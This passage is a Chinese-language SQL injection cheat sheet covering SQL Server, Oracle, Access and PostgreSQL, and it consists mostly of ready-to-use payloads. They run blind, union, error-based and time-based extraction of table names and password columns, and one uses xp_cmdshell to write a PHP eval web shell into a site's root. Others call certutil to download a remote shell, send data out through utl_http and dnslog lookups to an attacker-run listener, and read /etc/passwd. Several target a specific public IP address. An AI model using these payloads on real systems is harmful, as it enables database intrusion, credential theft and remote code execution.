AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N
爆破test數據庫中user表的字段數
and (select count(name) from test..syscolumns where id=(select id from test..sysobjects where name='users'))=3 #正常顯示
所以users表有3個字段
爆破test數據庫中users表的字段名
爆破test數據庫中user表的第一個字段名的長度
and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>1 正常顯示
and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>2 不正常顯示
所以users表的第一個字段名長度為2
爆破test數據庫中user表的第一個字段的第一個字符的ascii值,二分法
and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),1,1))>N
爆破test數據庫中user表的第一個字段的第二個字符的ascii值:
and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),2,1))>N
........
最后得到第一個字段為:id
爆破test數據庫中user表的第二個字段名的長度
and len((select top 1 col_name(object_id('users'),2) from test..sysobjects))>N
爆破test數據庫中user表的第二個字段的第一個字符的ascii值:
and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),1,1))>N
爆破test數據庫中user表的第二個字段的第二個字符的ascii值:
and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),2,1))>N
爆破test數據庫中user表的第三個字段的第三個字符的ascii值:
and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),3,1))>N
爆破test數據庫中user表的第三個字段名的長度
and len((select top 1 col_name(object_id('users'),3) from test..sysobjects))>N
........
這里假設我們爆出了users表的三個字段名:id,username,password
爆test數據庫user表中數據總條數
and (select count(*) from test..users)=N
由圖可知只有四條數據
爆破test數據庫中user表中password列中的數據
這里爆破數據的時候,不能爆破數據的長度,所以只能爆破數據的一個一個字符。當爆破到第某個字符出現其ascii值>0都不正常顯示時,說明這個字符位不存在,所以到前一位為止。
爆破test數據庫中users表中password列中第一行數據的第一個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),1,1))>N
爆破test數據庫中user表中password列中第一行數據的第二個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),2,1))>N
爆破test數據庫中user表中password列中第一行數據的第三個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),3,1))>N
爆破test數據庫中user表中password列中第一行數據的第四個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),4,1))>N
當爆破到第5個字符的時候,發現ascii>0都不正常顯示,說明,第一個數據長度為4
最后爆出test數據庫users表password列的第一條數據是:root
爆破test數據庫中user表中password列中第二行數據的第一個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),1,1))>N
爆破test數據庫中user表中password列中第二行數據的第二個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),2,1))>N
爆破test數據庫中user表中password列中第二行數據的第三個字符的ascii值
and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),3,1))>N
........
延時注入
判斷是否是SA權限
if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:2'
判斷是否是站庫分離(延時后返回正確頁面,確定站庫沒有分離)
if(host_name()=@@servername) WAITFOR DELAY '0:0:2'
判斷數據庫的個數
IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))=55) WAITFOR DELAY '0:0:2'
判斷是否開啟xp_cmdshell
if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:2'--
更多延時注入payload,可
以查看sqlmap
根據響應時間判斷執行是否正確
Union聯合查詢
首先order by查看有幾列
1 order by 3 正常顯示
1 order by 4 不正常顯示
說明有3列
然后我們可以select NULL,NULL,想查詢的數據
查詢數據庫版本
查詢所有數據庫名
SQLServer獲取權限的奇淫技巧
利用前提:
- 目標網站注入支持堆疊注入
- 當前權限是SA權限
- 使用sqlmap的 –os-shell 無法獲取到權限
這里很多人就會問了,既然是SA權限,不是可以直接利用xp_cmdshell執行系統命令嗎?對,沒錯,但是你使用xp_cmdshell執行的命令沒有回顯。我們這個獲取權限的思路就是,找到目標網站的絕對路徑,然后往絕對路徑下寫入木馬,然后獲取權限。
我們這里是通過先找到目標網站的一個文件,然后通過遍歷目標服務器的磁盤,找到該文件,將其路徑寫入自建的表中,然后再讀取該表得到網站絕對路徑。
這里利用的查找命令是:
查找目標機器C盤下的test.txt文件
for /r c:\ %i in (test*.txt) do @echo %i #這里的文件名后綴前那個點一定要加*號
dir /s /b c:\test.txt
這里假設我們已經知道目標網站下有一個test.txt文件,
創建表hack,並添加一個tmp的字段
create table hack (tmp varchar(1000));--
查看表是否創建成功:
python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test –tables
查找目標機器C盤下的test.txt路徑,並將結果寫入剛剛創建的hack表的tmp字段
;insert into hack(tmp) exec master..xp_cmdshell 'dir /s /b c:\test.txt';--
或
;insert into hack(tmp) exec master..xp_cmdshell 'for /r c:\ %i in (test*.txt) do @echo %i';--
以上兩條語句均可
讀取數據,得到目標網站絕對路徑為:C:\phpstudy\www
python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test -T hack –dump
將一句話木馬寫入目標網站根目錄,並命名為shell.php。注意這里的一句話木馬的 < 和 > 前要加上 ^
1;exec master..xp_cmdshell 'echo ^<?php @eval($_POST[x]);?^> > C:\phpstudy\www\shell.php';--
如果寫入的木馬文件連接不上的話,我們還可以通過下面手段使用 certutil 遠程下載木馬文件,前提是目標機器通公網
1;exec master..xp_cmdshell 'certutil -urlcache -split -f http://x.x.x.x/shell.php C:\phpstudy\www\shell2.php';--
連接下載的shell2.php木馬即可!
Oracle數據庫注入
注入點確定
跟其他數據庫一樣,檢測注入點都是可以通過拼接and語句進行判斷。這里通過and 1=1 和and 1=2進行判斷。實戰中還可以通過延時函數進行判斷。
http://219.153.49.228:43469/new_list.php?id=1%20and%201=1
http://219.153.49.228:43469/new_list.php?id=1%20and%201=2
顯錯注入(union聯合查詢)
1、判斷字段數為2
與其他注入一樣,這里通過order by來判斷字段數。因為order by 2頁面正常,order by 3頁面不正常,故判斷當前字段數為2。
http://219.153.49.228:43469/new_list.php?id=1%20order%20by%202
2、獲取顯錯點
聯合查詢這里使用了union select,oracle數據庫與mysql數據庫不同點在於它對於字段點數據類型敏感,也就是說我們不能直接union select 1,2,3來獲取顯錯點了,需要在字符型字段使用字符型數據,整型字段使用整型數據才可以。如下,兩個字段都為字符型,故使用union select 'null','null'。
(在有些情況下也采用union all select的形式進行聯合查詢。union all select與union select的不同點可以很容易理解為all表示輸出所有,也就是當數據出現相同時,將所有數據都輸出;union select則會將相同數據進行過濾,只輸出其中一條。)
#聯合查詢http://219.153.49.228:43469/new_list.php?id=-1 union select null,null from dual#修改null為'null',判斷字段類型均為字符型http://219.153.49.228:43469/new_list.php?id=-1 union select 'null','null' from dual
后續便可以替換顯錯點進行注入。
3、查詢數據庫版本信息
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
4、獲取當前數據庫連接用戶
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select sys_context('userenv','current_user') from dual) from dual http://219.153.49.228:44768/new_list.php?id=-1 union select '1',user from dual
5、查詢當前數據庫庫名
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
6、查詢數據庫表名
查詢表名一般查詢admin或者user表
直接查詢
獲取第一個表名LOGMNR_SESSION_EVOLVE$
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
獲取第二個表名LOGMNR_GLOBAL$:
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
模糊搜索查詢
獲取sns_users表名
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
7、查詢數據庫列名
直接查詢
獲取sns_users表里的字段
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual……http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual
獲取如下字段:USER_NAMEAGENT_NAMEPROTOCOLSPARE1DB_USERNAMEOIDEVENTIDNAMETABLE_OBJNOUSAGEUSER_PWD…………
模糊搜索查詢
http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual
8、查詢數據庫數據
獲取賬號密碼字段內容
http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
9、美化輸出
Oracle采用||進行數據連接
http://219.153.49.228:44768/new_list.php?id=-1 union select '用戶名:'||USER_NAME,'密碼:'||USER_PWD from "sns_users" where rownum=1
報錯注入
報錯注入是一種通過函數報錯前進行子查詢獲取數據,再通過錯誤頁面回顯的一種注入手法,下面介紹幾種報錯注入函數以及獲取一些常見的獲取數據,實際操作只需要將子查詢內的查詢語句進行替換即可。
1、ctxsys.drithsx.sn()
#獲取當前數據庫用戶 ORACLE1?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) -- 
#獲取數據庫版本信息?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1)) --
2、XMLType()
?id=1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --
3、dbms_xdb_version.checkin()
#獲取數據庫版本信息?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --
4、bms_xdb_version.makeversioned()
#獲取當前數據庫用戶 ORACLE1?id=1 and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
5、dbms_xdb_version.uncheckout()
#獲取數據庫版本信息?id=1 and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --
6、dbms_utility.sqlid_to_sqlhash()
#獲取數據庫版本信息?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --
7、ordsys.ord_dicom.getmappingxpath()
?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user)--
8、utl_inaddr.*()
utl_inaddr(用於取得局域網或Internet環境中的主機名和IP地址)
?id=1 and 1=utl_inaddr.get_host_name((select user from dual)) –-?id=1 and 1=utl_inaddr.get_host_address((select user from dual)) --
布爾型盲注
常用猜解:
#猜長度?id=1 and 6=(select length(user) from dual)#截取值猜ascii碼?id=1 and (select ascii(substr(user,1,1)) from dual)>83
decode函數布爾盲注
decode(字段或字段的運算,值1,值2,值3)
這個函數運行的結果是,當字段或字段的運算的值等於值1時,該函數返回值2,否則返回3
測試用戶名長度:
http://219.153.49.228:44768/new_list.php?id=1 and 6=(select length(user) from dual) --
測試當前用戶是否為SYSTEM:
#如果是system用戶則返回正常,不是則返回不正常http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(user,'SYSTEM',1,0) from dual) --#使用substr截斷,逐個字段進行猜解http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) – ?id=1 and 1=(select decode(substr(user,2,1),'Y',1,0) from dual) – ?id=1 and 1=(select decode(substr(user,3,1),'S',1,0) from dual) –?id=1 and 1=(select decode(substr(user,4,1),'T',1,0) from dual) –?id=1 and 1=(select decode(substr(user,5,1),'E',1,0) from dual) –?id=1 and 1=(select decode(substr(user,6,1),'M',1,0) from dual) –#當然也可以配合ascii碼進行猜解?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',1,0) from dual) --
instr函數布爾盲注
instr函數的應用:
select instr('abcdefgh','de') position from dual;#返回結果:4
盲注中的應用:
http://219.153.49.228:44768/new_list.php?id=1 and 1=(instr((select user from dual),'SYS')) --?id=1 and 4=(instr((select user from dual),'T')) --
延時盲注
1、檢測漏洞存在
DBMS_PIPE.RECEIVE_MESSAGE函數的作用是從指定管道獲取消息。
具體用法為:DBMS_PIPE.RECEIVE_MESSAGE('pipename',timeout)
pipename為varchar(128)的字符串,用以指定管道名稱,在這里我們輸入任意值即可。
timeout為integer的可選輸入參數,用來指定等待時間。
常用payload如下:
http://219.153.49.228:44768/new_list.php?id=1 and 1=dbms_pipe.receive_message('o', 10)--
如果頁面延時10秒返回,即存在注入。
2、配合decode函數延時盲注
只需要將延時語句放入decode函數中即可
#直接猜解字符?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('o',5),0) from dual) --#通過ascii猜解字符?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',dbms_pipe.receive_message('o',5),0) from dual) --
3、使用其他延時查詢來判斷
如(select count(*) from all_objects) ,因為查詢結果需要一定的時間,在無法使用dbms_pipe.receive_message()函數的情況下可以使用這個。具體操作只需要將decode()函數的返回結果進行替換即可。
#直接猜解字符?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) --#通過ascii猜解字符?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',(select count(*) from all_objects),0) from dual) --
外帶數據注入
1、url_http.request()
使用此方法,用戶需要有utl_http訪問網絡的權限
首先檢測是否支持,頁面返回正常則表示支持
?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --
然后python起一個http服務,或者開啟nc監聽。這里我使用python開啟一個服務:
python3 -m http.server 4455 #子查詢數據庫版本信息並訪問python起的http服務?id=1 and utl_http.request('http://192.168.100.130:4455/'||(select banner from sys.v_$version where rownum=1))=1--#http訪問時可以將||進行URL編碼?id=1 and utl_http.request('http://192.168.100.130:4455/'%7C%7C(select banner from sys.v_$version where rownum=1))=1--
可以看到成功獲取了數據
2、utl_inaddr.get_host_address()函數
#使用dnslog外帶數據?id=1 and (select utl_inaddr.get_host_address((select user from dual)||'.eeaijt.dnslog.cn') from dual)is not null --
3、SYS.DBMS_LDAP.INIT()函數
?id=1 and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --?id=1 and (select DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --
4、HTTPURITYPE()函數
?id=1 and (select HTTPURITYPE('http://192.168.100.130:4455/'||(select user from dual)).GETCLOB() FROM DUAL)is not null --
同樣需要python起一個http服務,或者nc創建監聽
雖然訪問404,但是同樣成功外帶數據。
getshell
待補充
Access數據庫注入
在Office 2007之前的Access數據庫文件的后綴是 .mdb ,Office2007及其之后的Access數據庫文件的后綴是 .accdb 。
Access數據庫屬於文件型數據庫,所以不需要端口號。
Access數據庫中沒有注釋符號.因此 /**/ 、 -- 和 # 都沒法使用。
Access是小型數據庫,當容量到達100M左右的時候性能就會開始下降。
Access數據庫不支持錯誤顯示注入,Access數據庫不能執行系統命令。
Access沒有數據庫的概念,所有的表都是在同一個數據庫下。
顯錯注入(union聯合查詢)
只需要先找到注入點,通過order by進行字段判斷,再使用可控輸入對目標數據庫進行聯合注入即可,本質上和MySQL的聯合注入差不多,不過它沒有information_schema庫,需要猜解它的表名和列名,如果猜對了就會在網頁上回顯。可以將以下常用的表名和列名進行猜解:
常見的表名:
admin,a_admin,x_admin,m_admin,adminuser,admin_user,article_admin,administrator,manage,manager,member,memberlist,user,users,Manage_User,user_info,admin_userinfo,UserGroups,user_list,login,用戶,Friend,zl,movie,news,password,clubconfig,config,company,book,art,dv_admin,userinfo
常見的列名:
username,adminusername,admin_username,adminname,admin_name,admin,adminuser,admin_user,usrname,usr_name,user_admin,password,admin_password,administrator,administrators,adminpassword,adminpwd,admin_pwd,adminpass,admin_pass,usrpass,usr_pass,user,name,pass,userpass,user_pass,userpassword,user_password,pwd,userpwd,user_pwd,useradmin,pword,p_word,pass-wd,yonghu,用戶,用戶名,密碼,帳號,id,uid,userid,user_id,adminid,admin_id,login_name
猜解方式:
猜測表名:
使用 exists 關鍵字:
判斷存在sql注入后,判斷是否存在admin表,如果存在,正常查詢,如果不存在,報語法錯誤。然后通過枚舉表名爆破
and exists(select * from admin)
猜測列名也是一樣,只能通過枚舉來猜測
判斷有admin表后,再判斷admin表有多少列,假如1-10正常查詢,11列報語法報錯,那說明有10列
and exists(select * from admin order by 10)
判斷出存在的列數后,再判斷具體的列名。以下語句判斷是否存在name列,如果存在,正常查詢,如果不存在,則報語法錯誤。然后再通過枚舉列名爆破
and exists(select name from admin)
布爾盲注
前面幾步和顯錯注入類似。
常用函數:
select len("string") 查詢給定字符串的長度
select asc("a") 查詢給定字符串的ascii值
top n 查詢前n條記錄
select mid("string",2,1) 查詢給定字符串從指定索引開始的長度
通過布爾盲注獲取數據:
access數據庫中沒有 limit,就不能限制查詢出來的行數。但是我們可以使用top命令,top 1是將查詢的所有數據只顯示第一行,所以 top3就是顯示查詢出來的前三行數據了
猜測admin列的第一個數據的長度,如果大於5查詢不出數據,大於4正常,說明admin列的第一個數據長度是5
and (select top 1 len(admin)from admin)>5
猜測admin列的第一行數據的第一個字符的ascii碼值,如果大於97查詢不出數據,大於96正常,說明admin列的第一行數據的第一個字符的ascii值是97
and (select top 1 asc(mid(admin,1,1))from admin)>97
第一行數據的第二個字符
and (select top 1 asc(mid(admin,2,1))from admin)>97
從第二行開始,查詢數據就得用另外的語句了,因為這里的top只能顯示查詢前幾條數據,所以我們得用聯合查詢,先查詢前兩條,然后倒序,然后在找出第一條,這就是第二條數據。
查詢第二行admin列的長度
and (select top 1 len(admin) from ( select top 2 * from information order by id) order by id desc)>55
下面是查詢第2條數據的第3個字符
and (select top 1 asc(mid(admin,3,1)) from ( select top 2 * from information order by id) order by id desc)>55
查詢第三條數據的4個字符
and (select top 1 asc(mid(admin,4,1)) from ( select top 3 * from information order by id) order by id desc)>55
PostgreSQL數據庫注入
PostgreSQL是一種特性非常齊全的自由軟件的對象-關系型數據庫管理系統(ORDBMS),4.2版本為基礎的對象關系型數據庫管理系統。
PostgreSQL安裝后,默認的端口是:5432,默認的用戶名是: postgres ,默認的數據庫也是:postgres 。
注釋符:--
延時函數:pg_sleep(3)
PostgreSQL和MySQL一樣,也有 information_schema 數據庫。
常用命令
select CURRENT_SCHEMA() #查看當前權限
select user #查看用戶
select current_user #查看當前用戶
select chr(97) #將ASCII碼轉為字符
select chr(97)||chr(100)||chr(109)||chr(105)||chr(110) #將ASCII轉換為字符串
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
select version() #查看PostgreSQL數據庫版本
SELECT current_database() #查看當前數據庫
select length('admin') #查看長度
select case when(expr1) then result1 else result2 end; #如果xx,執行result1,否則result2
例:select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;
select pg_read_file("/etc/passwd"); #讀取文件
select system("whoami"); #執行系統命令,11.2以下才有該命令
COPY (select '<?php phpinfo();?>') to '/tmp/1.php'; #寫入文件
|| 拼接字符串
DISTINCT 過濾重復
CAST 類型轉換 cast ('1' as numeric) 1轉換為數字類型
1::text 數據類型轉換為text類型
Numeric(10,2) 指字段是數字型,長度為10 小數為兩位的
case...when...then...else...end 條件語句
COALESCE(expr1,expr2…..) 返回列表中第一個非null的值,如果列表中所有的值都是null則返回null。
顯錯注入(union聯合查詢)
order by 3 #查看顯示列
select null,null,函數
然后接下來就是和MySQL注入一樣了,關於PostgreSQL的語句可以查看SQLMap
獲取模式名稱(schemaname)名稱
參考Sqlmap ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables簡化: ?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables-- 語法解析: COALESCE(expression[,n]) coalesce函數返回參數(列名)中第一個非NULL值的字段值,注意不是為空'' cast ('1' as numeric) 1轉換為數字類型簡化: ?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--
用戶創建的數據庫默認模式名稱(schemaname)為public
獲取數據表名稱
參考Sqlmap ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(tablename AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables WHERE schemaname IN ((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))簡化: uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')
獲取表字段名稱
參考Sqlmap ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(attname AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(typname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(116)||CHR(98)||CHR(117)||CHR(115)||CHR(101)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))--簡化: ?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'--
獲取表內容
參考Sqlmap UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM public.tbuser--簡化: ?uid=1 UNION ALL SELECT NULL,COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32))),NULL FROM public.tbuser--簡化整理: ?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--
報錯注入
參考Sqlmap
uid=1 AND 7778=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7778=7778) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)) AS NUMERIC)
語法解析:
cast ('1' as numeric) 1轉換為數字類型
Numeric(10,2) 指字段是數字型,長度為10 小數為兩位的
1::text 數據類型轉換為text類型
case...when...then...else...end 條件語句
獲取版本號:
select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)
獲取Schemas名稱:
select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)
select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables where schemaname not in ('public') limit 1)::text AS NUMERIC)
時間盲注
select pg_sleep(3)
1、SELECT CASE WHEN (length(current_database())=6) THEN pg_sleep(3) ELSE pg_sleep(0) END --+ #猜解數據庫長度
2、SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((CURRENT_SCHEMA()),0,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+ #猜解數據庫名稱
3、SELECT CASE WHEN (length(current_user)=6) THEN pg_sleep(3) ELSE pg_sleep(0) END --+ #猜解當前用戶長度
4、SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((current_user),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+ #逐位猜解用戶
布爾盲注
1 AND ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS CHARACTER(10000)),(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>48
堆疊查詢
和MySQL的堆疊注入一樣,在后面加上查詢語句即可。
其他
1)讀取文件:
select pg_read_file(filepath+filename);
(2)執行命令:
select system("comamnd_string");
(3)寫入文件:
COPY (select '<?php phpinfo();?>') to '/tmp/1.php';
參考
MySQL:https://xz.aliyun.com/t/7169
SQL Server : https://www.anquanke.com/post/id/200154
Oracle : https://xz.aliyun.com/t/9940
Access : https://www.freebuf.com/articles/web/284283.html
https://blog.csdn.net/qq_36119192/article/details/86468579
PostgreSQL: https://www.jianshu.com/p/ba0297da2c2e
https://blog.csdn.net/qq_36119192/article/details/104628797